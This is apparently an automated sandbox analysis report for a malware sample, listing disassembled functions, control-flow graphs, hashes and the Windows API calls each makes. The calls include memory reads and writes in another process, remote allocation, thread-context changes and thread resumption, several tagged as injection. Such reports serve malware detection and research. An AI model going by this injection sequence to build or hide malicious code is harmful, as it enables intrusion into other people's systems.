                                              • Snapshot File: hcaresult_4_2_b3c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: d0c0559f2c87b82237131067071c9429992b769d7f56c4a2c0c0e637ba914129
                                              • Instruction ID: 334ec38f1a3190d08b2453b6681b041535c1d4e9b1d3f7c14c3bb7234a2601c4
                                              • Opcode Fuzzy Hash: d0c0559f2c87b82237131067071c9429992b769d7f56c4a2c0c0e637ba914129
                                              • Instruction Fuzzy Hash: 0E212BB59003599FCB10DFA9D845BEEBBF5FF48320F10842AE519A7240D7789945CBA1
                                              Function 0B3C9979 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 543 b3c9979-b3c9a0d ReadProcessMemory 547 b3c9a0f-b3c9a15 543->547 548 b3c9a16-b3c9a46 543->548 547->548
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0B3C9A00
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2169905450.000000000B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_b3c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 8dbfd4dceb3777d3d338bf7a1d6fabc8cc958db3fe8e77507954435674921c9d
                                              • Instruction ID: be66cc4ac112e3cc1169baef03d46c1ca304c5ac42341090d3c6e4fdebb5705c
                                              • Opcode Fuzzy Hash: 8dbfd4dceb3777d3d338bf7a1d6fabc8cc958db3fe8e77507954435674921c9d
                                              • Instruction Fuzzy Hash: 782116B69003499FCB10DFAAD845AEEFBF5FF48320F10842AE519A7250D7399945CBA1
                                              Function 0B3C9458 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 533 b3c9458-b3c94a6 535 b3c94a8-b3c94b4 533->535 536 b3c94b6-b3c94f5 WriteProcessMemory 533->536 535->536 538 b3c94fe-b3c952e 536->538 539 b3c94f7-b3c94fd 536->539 539->538
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0B3C94E8
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2169905450.000000000B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_b3c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 2329b337f680ef091495ac1c9583a45d15af16b005f95e784217dffa4aa9c32e
                                              • Instruction ID: bcc578e741bec78adfb3cadd8385c06f0fefca02b81d5509a41e51ea447719db
                                              • Opcode Fuzzy Hash: 2329b337f680ef091495ac1c9583a45d15af16b005f95e784217dffa4aa9c32e
                                              • Instruction Fuzzy Hash: 82212AB59003499FCB10DFAAC985BEEBBF5FF48310F10842AE919A7250D7789945CBA0
                                              Function 0B3C92B9 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 552 b3c92b9-b3c930b 554 b3c930d-b3c9319 552->554 555 b3c931b-b3c934b Wow64SetThreadContext 552->555 554->555 557 b3c934d-b3c9353 555->557 558 b3c9354-b3c9384 555->558 557->558
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0B3C933E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2169905450.000000000B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_b3c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 2833b6d10f02708df897e4c85e9652710db0c2889f1f131238189bc9172ff1a9
                                              • Instruction ID: c21e0a46883a02da8a77efef4923a8223f797eeaa6ae31a0f3ebae55b6037162
                                              • Opcode Fuzzy Hash: 2833b6d10f02708df897e4c85e9652710db0c2889f1f131238189bc9172ff1a9
                                              • Instruction Fuzzy Hash: 042138B1D002098FDB10DFAAC4847EFBBF5EF88324F24842AD519A7250C7789945CFA0
                                              Function 0167D518 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 568 167d518-167d51b 569 167d520-167d5b4 DuplicateHandle 568->569 570 167d5b6-167d5bc 569->570 571 167d5bd-167d5da 569->571 570->571
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0167D4E6,?,?,?,?,?), ref: 0167D5A7
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2165773127.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1670000_sgxIb.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: c153b0b1086047babf83b456a09e3989f0364075808bef189b3608e526b1aa48
                                              • Instruction ID: 1cf2e0832c45b1f337427ad70c781f8c72e44b7124ce43ae0b1735bdc62cb22e
                                              • Opcode Fuzzy Hash: c153b0b1086047babf83b456a09e3989f0364075808bef189b3608e526b1aa48
                                              • Instruction Fuzzy Hash: 4A21E5B59002189FDB10CF9AD985ADEBFF8FB48314F14841AE914A3350D378A944CFA5
                                              Function 0167B580 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 562 167b580-167d5b4 DuplicateHandle 564 167d5b6-167d5bc 562->564 565 167d5bd-167d5da 562->565 564->565
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0167D4E6,?,?,?,?,?), ref: 0167D5A7
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2165773127.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1670000_sgxIb.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 64042a16baa8e0e0c2884e764fb03360f40c8133a576839c9fc87d6633f46d56
                                              • Instruction ID: e47714b11f5de0949ceee338c91169baa747619a1af93ef27db6f453a2bb7b34
                                              • Opcode Fuzzy Hash: 64042a16baa8e0e0c2884e764fb03360f40c8133a576839c9fc87d6633f46d56
                                              • Instruction Fuzzy Hash: 0A21E5B59002589FDB10CF9AD984ADEBFF5FF48314F14841AE914A3350D378A944CFA5
                                              Function 0B3C9980 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 584 b3c9980-b3c9a0d ReadProcessMemory 587 b3c9a0f-b3c9a15 584->587 588 b3c9a16-b3c9a46 584->588 587->588
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0B3C9A00
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2169905450.000000000B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_b3c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: a573daefdeae1c4dee3c8388408c02a22df326c14fcfbbc17cde26098f59ff79
                                              • Instruction ID: 0deaa7238bc2607417858aba456ccb63805e387023d32eaf4e14c252d1ff2d6d
                                              • Opcode Fuzzy Hash: a573daefdeae1c4dee3c8388408c02a22df326c14fcfbbc17cde26098f59ff79
                                              • Instruction Fuzzy Hash: 7D21F5B5C003499FCB10DFAAC885AEEFBF5FF48310F50842AE919A7250D7799945CBA1
                                              Function 0B3C92C0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 574 b3c92c0-b3c930b 576 b3c930d-b3c9319 574->576 577 b3c931b-b3c934b Wow64SetThreadContext 574->577 576->577 579 b3c934d-b3c9353 577->579 580 b3c9354-b3c9384 577->580 579->580
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0B3C933E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2169905450.000000000B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_b3c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: c41f64d178f9c65a723e22d8ff5780957a112812c59e34945cc4f3d904f23e00
                                              • Instruction ID: d524a7fa04f8db4f3dd2d24738c7be2e7dd851fd1c15a7576c802e24d10a8f0a
                                              • Opcode Fuzzy Hash: c41f64d178f9c65a723e22d8ff5780957a112812c59e34945cc4f3d904f23e00
                                              • Instruction Fuzzy Hash: 472118B19002098FDB10DFAAC4857EEBBF4EF88314F14842AD519A7240DB789945CFA1
                                              Function 0B3C9390 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0B3C9406
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2169905450.000000000B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_b3c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 1fbd6aec982361c73804281243d04aa1c5ea1a179ce3fd933311f2f0d3cdb3f3
                                              • Instruction ID: 8aa39bfa0d43020b02bf6579f8cb1cadc7cd10d742d2b1a087f0c2711c8ed6a9
                                              • Opcode Fuzzy Hash: 1fbd6aec982361c73804281243d04aa1c5ea1a179ce3fd933311f2f0d3cdb3f3
                                              • Instruction Fuzzy Hash: FF1159758002499FCB20DFAAD844BEFBFF5EF48320F24841AE519A7250CB799941CFA0
                                              Function 0B3C9398 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0B3C9406
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2169905450.000000000B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_b3c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 9461ae7385bb8d6e124dc153b0832b24e44ae6d0144577f07f9b6cc76b8a3978
                                              • Instruction ID: 37a59b1dd69b2beb9659a39b002946983ddc65ab9914eff60d17f1c95909eda1
                                              • Opcode Fuzzy Hash: 9461ae7385bb8d6e124dc153b0832b24e44ae6d0144577f07f9b6cc76b8a3978
                                              • Instruction Fuzzy Hash: 101137758002499FCB10DFAAC844BEFBFF5EF48320F24841AE519A7250CB79A944CFA0
                                              Function 0B3C9209 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2169905450.000000000B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_b3c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 89eff6ef12c276a5a38dc5d7e51c7b39987d6f911a257907b5cd3ad47521dea2
                                              • Instruction ID: 7e4e6fe474520961a17d238d82c93b4f6a632d516afc2317985036692292b4e3
                                              • Opcode Fuzzy Hash: 89eff6ef12c276a5a38dc5d7e51c7b39987d6f911a257907b5cd3ad47521dea2
                                              • Instruction Fuzzy Hash: F71158B59002488FCB20DFAAD4447EEFFF5EF88324F24845AD119A7250C7789944CFA0
                                              Function 0B3C9210 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2169905450.000000000B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_b3c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 23f8f76b09105b41ea8e1d8dabad6eba2acd8ed298faf8eacf6ffc216be00bdc
                                              • Instruction ID: 82c06f49d0d65acedf0777ee9c49e60a42c9eec25c464955f1023e3fc21f8b5c
                                              • Opcode Fuzzy Hash: 23f8f76b09105b41ea8e1d8dabad6eba2acd8ed298faf8eacf6ffc216be00bdc
                                              • Instruction Fuzzy Hash: 0A1136B1D002498FCB20DFAAC4457EFFBF5EF88324F24845AD519A7250CB79A944CBA4
                                              Function 0B3C2958 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0B3CC23D
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2169905450.000000000B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_b3c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 6db2f751ed0a83ea6006920141eb64de6cd10fd3b942d36342b98d9e8d708345
                                              • Instruction ID: e06e19689794f92e1d280593ae9f03ef17eaeffb4c9b67bedf7ba5ad113c9df2
                                              • Opcode Fuzzy Hash: 6db2f751ed0a83ea6006920141eb64de6cd10fd3b942d36342b98d9e8d708345
                                              • Instruction Fuzzy Hash: 2911E3B58002499FCB10DF9AD449BDFBBF8EB48310F20845AE518A7200D375A944CFA1
                                              Function 0B3CC1D8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0B3CC23D
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2169905450.000000000B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_b3c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: e0b6db7e3abe972220ec4e17b95d9ba9fd7c5407e7b9a6e2f9a37054a5948c83
                                              • Instruction ID: 0ce0a18b13da0e9ec12cacf090ab9113486874da7def405af5b8ca54e5764f32
                                              • Opcode Fuzzy Hash: e0b6db7e3abe972220ec4e17b95d9ba9fd7c5407e7b9a6e2f9a37054a5948c83
                                              • Instruction Fuzzy Hash: 1411F5B58002499FCB10DF99D845BDEBFF8EB48324F10845AE518A7600C379A984CFA1
                                              Function 0167B110 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0167B176
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2165773127.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1670000_sgxIb.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: eb56e8eec71a74f56046d167b4211cfd5d7192530c5cd80b06a706651b2c3352
                                              • Instruction ID: 54ea56a6c3423d327b8484454c5d702707e542740f9dc14d2e5c5b213cf68f54
                                              • Opcode Fuzzy Hash: eb56e8eec71a74f56046d167b4211cfd5d7192530c5cd80b06a706651b2c3352
                                              • Instruction Fuzzy Hash: 7D110FB5C002498FDB10DF9AD848A9EFBF4EF89220F10841AD528A7610C379A545CFA1
                                              Function 015DD3D8 Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2165510160.00000000015DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_15dd000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9c3a356834ad09ec48a6a2bf826bc19e753968c32d228172cd179b2bf8e56e1d
                                              • Instruction ID: 15efcdbc500f0fd8a252c31b2335f97737ea770cc4b3dd11ee4ef7816ef5cdac
                                              • Opcode Fuzzy Hash: 9c3a356834ad09ec48a6a2bf826bc19e753968c32d228172cd179b2bf8e56e1d
                                              • Instruction Fuzzy Hash: 2F21F471500204DFDB25DF98D9C0B6ABFB5FB98324F20C569D9090F296C37AE456C7A2
                                              Function 015ED01C Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2165556348.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_15ed000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6a8bcc0087f6c7d3b841ac30bf9130555293e82d713972688a03a6ed311ef93a
                                              • Instruction ID: 9a2d74957c761628659781f076ceb19499310a31590e1f24736e4fb7dc0243df
                                              • Opcode Fuzzy Hash: 6a8bcc0087f6c7d3b841ac30bf9130555293e82d713972688a03a6ed311ef93a
                                              • Instruction Fuzzy Hash: 9A210071A04204DFCB19DF68D988B26BFF5FB88314F28C969D90A0F256D33AD406CA61
                                              Function 015ED1D4 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2165556348.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_15ed000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f5bba7037e635fd7875e89c1c6d78e7ccb11775886c0062459c3b756efff61f2
                                              • Instruction ID: b2e3e94ff4e53a860adca8b1ecd16734c3ffb92c9bade9fa545c5a7d44a15f85
                                              • Opcode Fuzzy Hash: f5bba7037e635fd7875e89c1c6d78e7ccb11775886c0062459c3b756efff61f2
                                              • Instruction Fuzzy Hash: 1221F575904204DFDB09DFA8D5C8B2ABBF5FB84324F20C9ADD9494F296C33AD406CA61
                                              Function 015ED006 Relevance: .1, Instructions: 62COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2165556348.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_15ed000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6b3cc5269bec8a96fccac150a2e4a9ff70860651b73e2ed129a47ba98cfe5d01
                                              • Instruction ID: 254dfb741344112e61d0293b62c98a75742c827e83a9347fc92e8032bd78b848
                                              • Opcode Fuzzy Hash: 6b3cc5269bec8a96fccac150a2e4a9ff70860651b73e2ed129a47ba98cfe5d01
                                              • Instruction Fuzzy Hash: 4B219F755093808FDB07CF24D994715BFB1FB46214F28C5EAD8498F2A7C33A980ACB62
                                              Function 015DD3D3 Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2165510160.00000000015DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_15dd000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                              • Instruction ID: 2faebf6734f86c35b78dc3e2b129717a42b75b673c013950b8719bd63df373f1
                                              • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                              • Instruction Fuzzy Hash: B711CD72404240DFDB12CF48D5C4B5ABF71FB84224F24C6A9D9090A256C33AE45ACBA2
                                              Function 015ED1CF Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2165556348.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_15ed000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                              • Instruction ID: ec03755c698f5b3f5cf45dc61c9b821d85aa85167cf91281ecf00b551ca79186
                                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                              • Instruction Fuzzy Hash: E811BB75904280DFDB06CF54C5C8B19BFB1FB84224F24C6A9D8494F296C33AD40ACB62
                                              Function 015DD745 Relevance: .0, Instructions: 45COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2165510160.00000000015DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_15dd000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 45e1d1ab08d7eeafad06d057ba9b9e48e91ca010567cc19a2609a4c900aed037
                                              • Instruction ID: 57c02ba5bd5425be4ff872a384abd5c6a31ff7d4c94eaec10a29554e558c7fcd
                                              • Opcode Fuzzy Hash: 45e1d1ab08d7eeafad06d057ba9b9e48e91ca010567cc19a2609a4c900aed037
                                              • Instruction Fuzzy Hash: 7E01887110438499E7309A5DC984B56BFACFF45324F19C96AED090E2C6D2799841C7B1
                                              Function 015DD744 Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2165510160.00000000015DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_15dd000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b9e8c5f3332ab2c4418b5122b1ffa116427ea28b5803918b70039c51c65e04ba
                                              • Instruction ID: cf64ffed43059b80372064b2158678d2085321e92b35a9ae5f72c9b526703ff4
                                              • Opcode Fuzzy Hash: b9e8c5f3332ab2c4418b5122b1ffa116427ea28b5803918b70039c51c65e04ba
                                              • Instruction Fuzzy Hash: 02F062724043849AE7218E1EC888B66FFA8EF55735F18C45BED4C4E286C2799844CBB1

                                              Execution Graph

                                              Execution Coverage:11.5%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:17
                                              Total number of Limit Nodes:4
                                              execution_graph 24467 2ce0848 24469 2ce084e 24467->24469 24468 2ce091b 24469->24468 24471 2ce1340 24469->24471 24472 2ce1343 24471->24472 24473 2ce1454 24472->24473 24475 2ce80f9 24472->24475 24473->24469 24476 2ce8103 24475->24476 24477 2ce81b9 24476->24477 24480 6bdfa88 24476->24480 24484 6bdfa78 24476->24484 24477->24472 24482 6bdfa9d 24480->24482 24481 6bdfcae 24481->24477 24482->24481 24483 6bdfcc9 GlobalMemoryStatusEx GlobalMemoryStatusEx 24482->24483 24483->24482 24486 6bdfa9d 24484->24486 24485 6bdfcae 24485->24477 24486->24485 24487 6bdfcc9 GlobalMemoryStatusEx GlobalMemoryStatusEx 24486->24487 24487->24486

                                              Executed Functions

                                              Function 06BD3580 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 125 6bd3580-6bd35a1 126 6bd35a3-6bd35a6 125->126 127 6bd35ac-6bd35cb 126->127 128 6bd3d47-6bd3d4a 126->128 137 6bd35cd-6bd35d0 127->137 138 6bd35e4-6bd35ee 127->138 129 6bd3d4c-6bd3d6b 128->129 130 6bd3d70-6bd3d72 128->130 129->130 132 6bd3d79-6bd3d7c 130->132 133 6bd3d74 130->133 132->126 135 6bd3d82-6bd3d8b 132->135 133->132 137->138 140 6bd35d2-6bd35e2 137->140 143 6bd35f4-6bd3603 138->143 140->143 254 6bd3605 call 6bd3d99 143->254 255 6bd3605 call 6bd3da0 143->255 144 6bd360a-6bd360f 145 6bd361c-6bd38f9 144->145 146 6bd3611-6bd3617 144->146 167 6bd38ff-6bd39ae 145->167 168 6bd3d39-6bd3d46 145->168 146->135 177 6bd39d7 167->177 178 6bd39b0-6bd39d5 167->178 179 6bd39e0-6bd39f3 call 6bd316c 177->179 178->179 183 6bd39f9-6bd3a1b call 6bd3178 179->183 184 6bd3d20-6bd3d2c 179->184 183->184 188 6bd3a21-6bd3a2b 183->188 184->167 185 6bd3d32 184->185 185->168 188->184 189 6bd3a31-6bd3a3c 188->189 189->184 190 6bd3a42-6bd3b18 189->190 202 6bd3b1a-6bd3b1c 190->202 203 6bd3b26-6bd3b56 190->203 202->203 207 6bd3b58-6bd3b5a 203->207 208 6bd3b64-6bd3b70 203->208 207->208 209 6bd3bd0-6bd3bd4 208->209 210 6bd3b72-6bd3b76 208->210 211 6bd3bda-6bd3c16 209->211 212 6bd3d11-6bd3d1a 209->212 210->209 213 6bd3b78-6bd3ba2 210->213 224 6bd3c18-6bd3c1a 211->224 225 6bd3c24-6bd3c32 211->225 212->184 212->190 220 6bd3ba4-6bd3ba6 213->220 221 6bd3bb0-6bd3bcd call 6bd3184 213->221 220->221 221->209 224->225 228 6bd3c49-6bd3c54 225->228 229 6bd3c34-6bd3c3f 225->229 232 6bd3c6c-6bd3c7d 228->232 233 6bd3c56-6bd3c5c 228->233 229->228 234 6bd3c41 229->234 238 6bd3c7f-6bd3c85 232->238 239 6bd3c95-6bd3ca1 232->239 235 6bd3c5e 233->235 236 6bd3c60-6bd3c62 233->236 234->228 235->232 236->232 240 6bd3c89-6bd3c8b 238->240 241 6bd3c87 238->241 243 6bd3cb9-6bd3d0a 239->243 244 6bd3ca3-6bd3ca9 239->244 240->239 241->239 243->212 245 6bd3cad-6bd3caf 244->245 246 6bd3cab 244->246 245->243 246->243 254->144 255->144
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-3723351465
                                              • Opcode ID: 4f268cb1f3cd0c09e5a2ebe435053012aae5d23353685927d1b05d62d4b4cf29
                                              • Instruction ID: 2e16ee688afcd21a078cb2ef4aee5926e2105f3c3d346c0b1dfc16171de8ac32
                                              • Opcode Fuzzy Hash: 4f268cb1f3cd0c09e5a2ebe435053012aae5d23353685927d1b05d62d4b4cf29
                                              • Instruction Fuzzy Hash: 91325030E1071A8FCB14EF74D89459DB7F6FFC9300F1486AAD449AB265EB70A985CB81
                                              Function 06BD7E98 Relevance: 3.0, Strings: 2, Instructions: 475COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
